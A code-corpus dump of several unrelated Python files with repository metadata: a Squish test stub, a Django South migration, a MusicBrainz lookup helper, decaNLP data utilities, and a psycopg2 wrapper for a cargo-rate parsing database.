{ 'name': 'MyOpenID', 'url': 'https://www.myopenid.com' } ]
|
[
"luningcowboy@gmail.com"
] |
luningcowboy@gmail.com
|
a4e77f0776606f0a309094559dcad9e0c32954f5
|
308953409e1a3b828ac49b7301c1e751cbf762cf
|
/suite_EETc 21/tst_New_Factory_Reset_Import/test.py
|
7b07a75708d02a52cf6a0deb7faad6f848d82f6f
|
[] |
no_license
|
asthagaur1/danfoss-automation
|
4dcc7d8f000917b67e4d6f46ff862a525ddcbc5e
|
213a99d3375889cd0e0c801421a50e9fe6085879
|
refs/heads/main
| 2023-03-31T23:26:56.956107
| 2021-04-01T08:52:37
| 2021-04-01T08:52:37
| 353,627,845
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 414
|
py
|
def main():
excel = r"C:\gitworkspace\KoolProg-TestAutomation\Master_Functions\Test_Automation\SourceCode\suite_EETc 21\shared\testdata\New_Factory_Reset_Import.xls";
#Mapping with Global scripts for Function library and key action.
source(findFile("scripts", "Functions.py"))
source(findFile("scripts", "Actions.py"))
# source(findFile("scripts", "object_id.py"))
keyAction(excel)
|
[
"asthagaur@danfoss.com"
] |
asthagaur@danfoss.com
|
db2e8f2e37710404f33d22a0aceafc1fbb6f1009
|
ceeea27fddee32f76d138e5a9b135c9686147676
|
/env/lib/python3.8/site-packages/location/migrations/0008_auto__add_field_locationconsumersettings_icloud_timezone.py
|
2ab1f2e5eaae3f23b949d3c39791b23f64b2cfe5
|
[
"MIT"
] |
permissive
|
angels101/practice-django-framework-api-
|
8e237efc20a797a2d45d836a28eb90f97d1535b7
|
0a888c75126940c33bc7afc14b8d1496c586512f
|
refs/heads/main
| 2023-04-14T17:28:48.136114
| 2021-04-19T11:27:13
| 2021-04-19T11:27:13
| 357,435,663
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,123
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'LocationConsumerSettings.icloud_timezone'
db.add_column(u'location_locationconsumersettings', 'icloud_timezone',
self.gf('django.db.models.fields.CharField')(default='US/Pacific', max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'LocationConsumerSettings.icloud_timezone'
db.delete_column(u'location_locationconsumersettings', 'icloud_timezone')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'location.locationconsumersettings': {
'Meta': {'object_name': 'LocationConsumerSettings'},
'icloud_device_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'icloud_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'icloud_password': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'icloud_timezone': ('django.db.models.fields.CharField', [], {'default': "'US/Pacific'", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'icloud_username': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'runmeter_email': ('django.db.models.fields.EmailField', [], {'max_length': '255'}),
'runmeter_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'location_consumer_settings'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
u'location.locationsnapshot': {
'Meta': {'object_name': 'LocationSnapshot'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {'geography': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'points'", 'null': 'True', 'to': u"orm['location.LocationSource']"})
},
u'location.locationsource': {
'Meta': {'object_name': 'LocationSource'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'data': ('jsonfield.fields.JSONField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['location.LocationSourceType']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'location_sources'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'location.locationsourcetype': {
'Meta': {'object_name': 'LocationSourceType'},
'icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
}
}
complete_apps = ['location']
|
[
"angelscodex101@gmail.com"
] |
angelscodex101@gmail.com
|
284f857566050d27403cbc88caec96c5ddefb015
|
fd87102dc12fff6ab7262aabae7c365c58a9ad6f
|
/audioclick/mblookup.py
|
973066e94adaea02b83e87c378ad37f2ac9526c9
|
[] |
no_license
|
vasuman/audioclick
|
fe3bc62d067c1a3846d69f60bb24a3ed1b257c5d
|
5f60689e53b8fcda3ed61f20ff58feb98d6785b3
|
refs/heads/master
| 2021-01-19T06:32:14.997649
| 2012-08-14T06:09:30
| 2012-08-14T06:09:30
| 5,215,118
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,127
|
py
|
import urllib2
import json
import musicbrainzngs as mb
import logging
mb.set_useragent('AudioClick','0.1dev')
def generate_track(rec_info,final_release):
track={}
track['title']=rec_info['title']
track['artist']=rec_info['artist-credit-phrase']
track['musicbrainz_trackid']=final_release['trackid']
track['album']=final_release['title'].encode('ascii','ignore')
track['date']=final_release['date']
logging.debug(final_release.keys())
track['musicbrainz_albumid']=final_release['id']
return track
def extract_year(release):
if 'date' in release.keys() :
year=int(release['date'].replace('-',''))
if len(release['date'])==4:
year=int(release['date']+'1231')
return year
return -1
def find_oldest_release(releases):
releases.sort(key=extract_year)
for release in releases:
if 'date' in release.keys() and release['status']=='Official':
return release
def single_match(mbids):
(mbid_rec, release_list)=match_recording(mbids)
oldest_release=find_oldest_release(release_list)
oldest_rec=mbid_rec[oldest_release['trackid']]
return generate_track(oldest_rec,oldest_release)
def match_recording(mbids):
release_list=[]
mbid_rec={}
for mbid in mbids:
try:
mbid_info=mb.get_recording_by_id(mbid,['artists','releases'],['official'])['recording']
except mb.musicbrainz.ResponseError :
logging.warning('{0} is an invalid MusicBrainz ID. Skipping...'.format(mbid))
continue
mbid_rlist=mbid_info['release-list']
mbid_rec[mbid]=mbid_info
for item in mbid_rlist:
item['trackid']=mbid
release_list.extend(mbid_rlist)
return (mbid_rec, release_list)
#Yet to be implemented
def album_match(tracked_mbids):
all_releases=[]
album_match={}
for mbids in tracked_mbids:
(mbid_rec, release_list)=match_recording(mbids)
all_releases.extend(release_list)
for item in release_list:
if not item['id'] in album_match:
album_match[item['id']]=1
continue
album_match[item['id']]+=1
match_score=lambda item: album_match[item]
final_album=max(album_match, key=match_score)
print final_album
for item in all_releases:
if final_album['id']==item['id']:
print item
|
[
"vasumanar@gmail.com"
] |
vasumanar@gmail.com
|
7da2d62723cf241c6ab65437c17e738eed8b2a76
|
e7de2a57c397ba6e3d2059b76b13ca6c4cdce5e8
|
/util.py
|
fa5bcd7c5a19393aa49201d59cdc9ae92cfe8740
|
[
"BSD-3-Clause"
] |
permissive
|
wingpang-gz/decaNLP
|
2a8baedd490748f4fe43a0825b09b3fa6a79769f
|
d776d9f600c127a0a3e28c85960cf0ea615e8f63
|
refs/heads/master
| 2020-03-26T18:07:49.767505
| 2018-08-16T19:51:40
| 2018-08-16T19:51:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,643
|
py
|
from text import torchtext
import time
import os
import sys
import torch
import random
import numpy as np
def get_context_question(ex, context, question, field):
return ex.context_special + ex.context + ex.question_special + ex.question
def preprocess_examples(args, tasks, splits, field, logger=None, train=True):
min_length = 1
max_context_length = args.max_train_context_length if train else args.max_val_context_length
is_too_long = lambda ex: (len(ex.answer)>args.max_answer_length or
len(ex.context)>max_context_length)
is_too_short = lambda ex: (len(ex.answer)<min_length or
len(ex.context)<min_length)
for task, s in zip(tasks, splits):
if logger is not None:
logger.info(f'{task} has {len(s.examples)} examples')
if 'cnn' in task or 'dailymail' in task or 'imdb' in task:
for x in s.examples:
x.context = x.context[:max_context_length]
if train:
l = len(s.examples)
s.examples = [ex for ex in s.examples if not is_too_long(ex)]
if len(s.examples) < l:
if logger is not None:
logger.info(f'Filtering out long {task} examples: {l} -> {len(s.examples)}')
l = len(s.examples)
s.examples = [ex for ex in s.examples if not is_too_short(ex)]
if len(s.examples) < l:
if logger is not None:
logger.info(f'Filtering out short {task} examples: {l} -> {len(s.examples)}')
l = len(s.examples)
s.examples = [ex for ex in s.examples if 'This page includes the show' not in ex.answer]
if len(s.examples) < l:
if logger is not None:
logger.info(f'Filtering {task} examples with a dummy summary: {l} -> {len(s.examples)} ')
if logger is not None:
context_lengths = [len(ex.context) for ex in s.examples]
question_lengths = [len(ex.question) for ex in s.examples]
answer_lengths = [len(ex.answer) for ex in s.examples]
logger.info(f'{task} context lengths (min, mean, max): {np.min(context_lengths)}, {int(np.mean(context_lengths))}, {np.max(context_lengths)}')
logger.info(f'{task} question lengths (min, mean, max): {np.min(question_lengths)}, {int(np.mean(question_lengths))}, {np.max(question_lengths)}')
logger.info(f'{task} answer lengths (min, mean, max): {np.min(answer_lengths)}, {int(np.mean(answer_lengths))}, {np.max(answer_lengths)}')
for x in s.examples:
x.context_question = get_context_question(x, x.context, x.question, field)
if logger is not None:
logger.info('Tokenized examples:')
for ex in s.examples[:10]:
logger.info('Context: ' + ' '.join(ex.context))
logger.info('Question: ' + ' '.join(ex.question))
logger.info(' '.join(ex.context_question))
logger.info('Answer: ' + ' '.join(ex.answer))
def set_seed(args, rank=None):
if rank is not None:
device = args.gpus[rank]
else:
if isinstance(args.gpus, list):
device = args.gpus[0]
else:
device = args.gpus
os.environ['CUDA_VISIBLE_DEVICES'] = f'{device}'
print(f'device: {device}')
np.random.seed(args.seed)
random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
def count_params(params):
def mult(ps):
r = 0
for p in ps:
this_r = 1
for s in p.size():
this_r *= s
r += this_r
return r
return mult(params)
def get_trainable_params(model):
return list(filter(lambda p: p.requires_grad, model.parameters()))
def elapsed_time(log):
t = time.time() - log.start
day = int(t // (24 * 3600))
t = t % (24 * 3600)
hour = int(t // 3600)
t %= 3600
minutes = int(t // 60)
t %= 60
seconds = int(t)
return f'{day:02}:{hour:02}:{minutes:02}:{seconds:02}'
def get_splits(args, task, FIELD, **kwargs):
if 'multi30k' in task:
src, trg = ['.'+x for x in task.split('.')[1:]]
split = torchtext.datasets.generic.Multi30k.splits(exts=(src, trg),
fields=FIELD, root=args.data, **kwargs)
if 'iwslt' in task:
src, trg = ['.'+x for x in task.split('.')[1:]]
split = torchtext.datasets.generic.IWSLT.splits(exts=(src, trg),
fields=FIELD, root=args.data, **kwargs)
if 'squad' in task:
split = torchtext.datasets.generic.SQuAD.splits(
fields=FIELD, root=args.data, **kwargs)
if task == 'wikisql':
split = torchtext.datasets.generic.WikiSQL.splits(
fields=FIELD, root=args.data, **kwargs)
if 'ontonotes.ner' in task:
split_task = task.split('.')
_, _, subtask, nones, counting = split_task
split = torchtext.datasets.generic.OntoNotesNER.splits(
subtask=subtask, nones=True if nones == 'nones' else False,
fields=FIELD, root=args.data, **kwargs)
if 'woz' in task:
split = torchtext.datasets.generic.WOZ.splits(description=task,
fields=FIELD, root=args.data, **kwargs)
if 'multinli' in task:
split = torchtext.datasets.generic.MultiNLI.splits(description=task,
fields=FIELD, root=args.data, **kwargs)
if 'srl' in task:
split = torchtext.datasets.generic.SRL.splits(
fields=FIELD, root=args.data, **kwargs)
if 'snli' in task:
split = torchtext.datasets.generic.SNLI.splits(
fields=FIELD, root=args.data, **kwargs)
if 'schema' in task:
split = torchtext.datasets.generic.WinogradSchema.splits(
fields=FIELD, root=args.data, **kwargs)
if task == 'cnn':
split = torchtext.datasets.generic.CNN.splits(
fields=FIELD, root=args.data, **kwargs)
if task == 'dailymail':
split = torchtext.datasets.generic.DailyMail.splits(
fields=FIELD, root=args.data, **kwargs)
if task == 'cnn_dailymail':
split_cnn = torchtext.datasets.generic.CNN.splits(
fields=FIELD, root=args.data, **kwargs)
split_dm = torchtext.datasets.generic.DailyMail.splits(
fields=FIELD, root=args.data, **kwargs)
for scnn, sdm in zip(split_cnn, split_dm):
scnn.examples.extend(sdm)
split = split_cnn
if 'sst' in task:
split = torchtext.datasets.generic.SST.splits(
fields=FIELD, root=args.data, **kwargs)
if 'imdb' in task:
kwargs['validation'] = None
split = torchtext.datasets.generic.IMDb.splits(
fields=FIELD, root=args.data, **kwargs)
if 'zre' in task:
split = torchtext.datasets.generic.ZeroShotRE.splits(
fields=FIELD, root=args.data, **kwargs)
elif os.path.exists(os.path.join(args.data, task)):
split = torchtext.datasets.generic.JSON.splits(
fields=FIELD, root=args.data, name=task, **kwargs)
return split
def batch_fn(new, i, sofar):
prev_max_len = sofar / (i - 1) if i > 1 else 0
return max(len(new.context), 5*len(new.answer), prev_max_len) * i
def pad(x, new_channel, dim, val=None):
if x.size(dim) > new_channel:
x = x.narrow(dim, 0, new_channel)
channels = x.size()
assert (new_channel >= channels[dim])
if new_channel == channels[dim]:
return x
size = list(channels)
size[dim] = new_channel - size[dim]
padding = x.new(*size).fill_(val)
return torch.cat([x, padding], dim)
|
[
"bryan.mccann.is@gmail.com"
] |
bryan.mccann.is@gmail.com
|
63bb1f85690d6a2db33908697c2a176e9ed47132
|
442620638423710f68f719b28a645d4041eec346
|
/modules/sql_main.py
|
b2efe37e8570647cdbe95f349a2b65240efb9d36
|
[] |
no_license
|
ivprokofyev/cb_parsing
|
324e0160ebb04926085b51fecb438101f42d76dd
|
c2370679844554f1c96939017cc1875c5a2c214a
|
refs/heads/master
| 2020-04-05T21:49:35.684748
| 2018-12-01T22:37:08
| 2018-12-01T22:38:08
| 157,234,680
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,634
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import psycopg2
class SqlShell:
"""
Middle-end для доступа к БД
Методы:
Для парсеров
countInputParsers - посчет количества записей спарсенных тарифов в БД
getAllIdInputParsers - получение всех записей по ID агента в БД
checkInputParsers - проверка маршрутов на уникальность
insertInputParsers - запись новых маршрутов
updateInputParsers - обновление тарифов для существующих маршрутов
deleteInputParsers - удаление неактуальных маршрутов
Для обработки "сырых" данных
getConvDb - получаем список всех записей для обработки
checkAirportsConvDb - проверка наличия id для наименования аэропорта
checkAirlinesConvDb - проверка наличия id для наименования авиакомпании
checkTypeConvDb - проверка наличия id для типа груза
countRoutesConvDB - количество маршрутов в итоговой БД
routeConvDb - конвертация временных записей парсеров в итоговую таблицу Маршрутов
rateRowConvDb - проверка зависимости от весовых диапозонов
rateConvDb - конвертация временных записей парсеров в итоговую таблицу Тарифов
addAirportConvDb - добавление наименования аэропорта в альтернативный справочник
addAirlineConvDb - добавление наименования авиакомпании в альтернативный справочник
addTypeConvDb - добавление наименования типа груза в альтернативный справочник
Общие
closeConnection - закрытие курсора и соединения к БД для экземпляра класса
"""
DATABASE = {
'local': "host='localhost' dbname='****' user='****' password='****'"
}
def __init__(self,
connection=DATABASE['local']
):
self.connection = psycopg2.connect(connection)
self.cursor = self.connection.cursor()
def countInputParsers(self):
self.cursor.execute('''select count(*)
from input_parsers''')
count_row = self.cursor.fetchall()[0][0]
return count_row
def getAllIdInputParsers(self, id_carrier):
self.cursor.execute('''select id_record_parsers
from input_parsers
where id_carrier = %s''', (id_carrier,))
return self.cursor.fetchall()
def checkInputParsers(self, id_carrier=None,
airport_from_ikao=None,
city_to=None,
airline_ikao=None,
city_transit=None,
airport_transit_ikao=None,
airport_from_name=None,
airport_from_iata=None,
airport_transit_iata=None,
city_from=None):
self.cursor.execute('''select id_record_parsers
from input_parsers
where id_carrier = %s
and (airport_from_ikao = %s or airport_from_ikao is null)
and (city_to = %s or city_to is null)
and (airline_ikao = %s or airline_ikao is null)
and (city_transit = %s or city_transit is null)
and (airport_transit_ikao = %s or airport_transit_ikao is null)
and (airport_from_name = %s or airport_from_name is null)
and (airport_from_iata = %s or airport_from_iata is null)
and (airport_transit_iata = %s or airport_transit_iata is null)
and (city_from = %s or city_from is null)
''', (id_carrier,
airport_from_ikao,
city_to,
airline_ikao,
city_transit,
airport_transit_ikao,
airport_from_name,
airport_from_iata,
airport_transit_iata,
city_from))
return self.cursor.fetchall()
def insertInputParsers(self, id_carrier=None,
airport_from_ikao=None,
city_to=None,
airline_ikao=None,
city_transit=None,
weight_min_kg=None,
rate_1_rub=None,
airport_transit_ikao=None,
airport_from_name=None,
cost_min_rub=None,
airport_from_iata=None,
airport_transit_iata=None,
city_from=None):
self.cursor.execute('''
insert into input_parsers(
id_carrier,
airport_from_ikao,
city_to,
airline_ikao,
weight_min_kg,
weight_1_from_kg,
weight_1_to_kg,
rate_1_rub,
cargo_type,
city_transit,
airport_transit_ikao,
airport_from_name,
cost_min_rub,
airport_from_iata,
airport_transit_iata,
city_from
)
values (
%s,
%s,
%s,
%s,
%s,
0,
9999,
%s,
'GENERAL',
%s,
%s,
%s,
%s,
%s,
%s,
%s
)
RETURNING id_record_parsers
''', (id_carrier,
airport_from_ikao,
city_to,
airline_ikao,
weight_min_kg,
rate_1_rub,
city_transit,
airport_transit_ikao,
airport_from_name,
cost_min_rub,
airport_from_iata,
airport_transit_iata,
city_from))
self.connection.commit()
return self.cursor.fetchall()
def updateInputParsers(self, id_carrier=None,
airport_from_ikao=None,
city_to=None,
airline_ikao=None,
city_transit=None,
weight_min_kg=None,
rate_1_rub=None,
airport_transit_ikao=None,
airport_from_name=None,
cost_min_rub=None,
airport_from_iata=None,
airport_transit_iata=None,
city_from=None):
self.cursor.execute('''
update input_parsers
set weight_min_kg = %s,
rate_1_rub = %s,
cost_min_rub = %s
where id_carrier = %s
and (airport_from_ikao = %s or airport_from_ikao is null)
and (city_to = %s or city_to is null)
and (airline_ikao = %s or airline_ikao is null)
and (city_transit = %s or city_transit is null)
and (airport_transit_ikao = %s or airport_transit_ikao is null)
and (airport_from_name = %s or airport_from_name is null)
and (airport_from_iata = %s or airport_from_iata is null)
and (airport_transit_iata = %s or airport_transit_iata is null)
and (city_from = %s or city_from is null)
RETURNING id_record_parsers
''', (weight_min_kg,
rate_1_rub,
cost_min_rub,
id_carrier,
airport_from_ikao,
city_to,
airline_ikao,
city_transit,
airport_transit_ikao,
airport_from_name,
airport_from_iata,
airport_transit_iata,
city_from))
self.connection.commit()
return self.cursor.fetchall()
def deleteInputParsers(self, id_record_parsers=None):
self.cursor.execute('''delete
from input_parsers
where id_record_parsers = %s
''', (id_record_parsers,))
self.connection.commit()
def getConvDb(self):
self.cursor.execute('''
select city_from,
airport_from_iata,
airport_from_ikao,
airport_from_name,
city_to,
airport_to_iata,
airport_to_ikao,
airport_to_name,
city_transit,
airport_transit_iata,
airport_transit_ikao,
airport_transit_name,
airline_name,
airline_iata,
airline_ikao,
id_carrier,
cargo_type,
id_record_parsers
from input_parsers;
''')
return self.cursor.fetchall()
def checkAirportsConvDb(self, airport=None):
self.cursor.execute('''
select id_airport
from airports
where lower(%s) in (
lower(airport_name),
lower(airport_code_iata),
lower(airport_code_ikao),
lower(city_name)
)
union
select id_airport
from airports_alt
where lower(airport_name_alt) = lower(%s);
''', (airport, airport))
return self.cursor.fetchone()
def checkAirlinesConvDb(self, airline=None):
self.cursor.execute('''
select id_airlines
from airlines
where lower(%s) in (
lower(airline_name),
lower(airline_iata),
lower(airline_ikao)
)
union
select id_airlines
from airlines_alt
where lower(airlines_name_alt) = lower(%s);
''', (airline, airline))
return self.cursor.fetchone()
def checkTypeConvDb(self, type=None):
self.cursor.execute('''
select id_cargo_type
from cargo_type
where lower(cargo_type_name) = lower(%s)
''', (type, ))
return self.cursor.fetchone()
def countRoutesConvDB(self):
self.cursor.execute('''select count(*) from carrier_routes''')
return self.cursor.fetchall()[0][0]
def routeConvDb(self,
id_record_parsers=None,
id_carrier=None,
id_airport_from=None,
id_airport_to=None,
id_airport_transit=None,
id_airline=None,
id_cargo_type=None
):
self.cursor.execute('''
insert into carrier_routes
(
id_record_parsers,
id_carrier,
id_airport_from,
id_airport_to,
id_airport_transit,
id_airlines,
id_cargo_type
)
values
(
%s,
%s,
(
select id_airport
from airports
where lower(%s) in
(
lower(airport_name),
lower(airport_code_iata),
lower(airport_code_ikao),
lower(city_name)
)
union
select id_airport
from airports_alt
where lower(airport_name_alt) = lower(%s)
),
(
select id_airport
from airports
where lower(%s) in
(
lower(airport_name),
lower(airport_code_iata),
lower(airport_code_ikao),
lower(city_name)
)
union
select id_airport
from airports_alt
where lower(airport_name_alt) = lower(%s)
),
(
select id_airport
from airports
where lower(%s) in
(
lower(airport_name),
lower(airport_code_iata),
lower(airport_code_ikao),
lower(city_name)
)
union
select id_airport
from airports_alt
where lower(airport_name_alt) = lower(%s)
),
(
select id_airlines
from airlines
where lower(%s) in
(
lower(airline_name),
lower(airline_iata),
lower(airline_ikao)
)
union
select id_airlines
from airlines_alt
where lower(airlines_name_alt) = lower(%s)
),
(
select id_cargo_type
from cargo_type
where lower(cargo_type_name) = lower(%s)
)
)
ON CONFLICT
(
id_carrier,
id_airport_from,
id_airport_to,
id_airlines,
id_cargo_type,
id_airport_transit
)
DO NOTHING
RETURNING id_route, id_record_parsers
''', (id_record_parsers,
id_carrier,
id_airport_from, id_airport_from,
id_airport_to, id_airport_to,
id_airport_transit, id_airport_transit,
id_airline, id_airline,
id_cargo_type))
self.connection.commit()
return self.cursor.fetchall()
def rateRowConvDb(self, number=1, id_parsers=None):
self.cursor.execute('''select rate_%s_rub
from input_parsers
where id_record_parsers = %s
''', (number, id_parsers))
return self.cursor.fetchone()[0]
def rateConvDb(self, id_route=None, number=1, id_parsers=None):
self.cursor.execute('''
insert into carrier_rates
(
id_route,
weight_min_kg,
weight_from_kg,
weight_to_kg,
cost_min_rub,
rate_rub
)
values (
%s,
(
select weight_min_kg
from input_parsers
where id_record_parsers = %s
),
(
select weight_%s_from_kg
from input_parsers
where id_record_parsers = %s
),
(
select weight_%s_to_kg
from input_parsers
where id_record_parsers = %s
),
(
select cost_min_rub
from input_parsers
where id_record_parsers = %s
),
(
select rate_%s_rub
from input_parsers
where id_record_parsers = %s
)
)
''', ((id_route,
id_parsers,
number,
id_parsers,
number,
id_parsers,
id_parsers,
number,
id_parsers,)))
self.connection.commit()
def addAirportConvDb(self, keyboard=None, airport=None):
self.cursor.execute('''
select setval('airports_alt_id_airports_alt_seq',
(select max(id_airports_alt) from airports_alt));
insert into airports_alt
(id_airport,
airport_name_alt)
values (%s, %s)
''', (keyboard, airport))
self.connection.commit()
def addAirlineConvDb(self, keyboard=None, airline=None):
self.cursor.execute('''
select setval('airlines_alt_id_airlines_alt_seq',
(select max(id_airlines_alt) from airlines_alt));
insert into airlines_alt
(id_airlines,
airlines_name_alt)
values (%s, %s)
''', (keyboard, airline))
self.connection.commit()
def addTypeConvDb(self, keyboard=None, type=None):
self.cursor.execute('''
select setval('cargo_type_alt_id_cargo_type_alt_seq',
(select max(id_cargo_type_alt) from cargo_type_alt));
insert into cargo_type_alt
(id_cargo_type,
cargo_type_name_alt)
values (%s, %s)
''', (keyboard, type))
self.connection.commit()
def closeConnection(self):
self.cursor.close()
self.connection.close()
|
[
"iv.prokofyev@gmail.com"
] |
iv.prokofyev@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.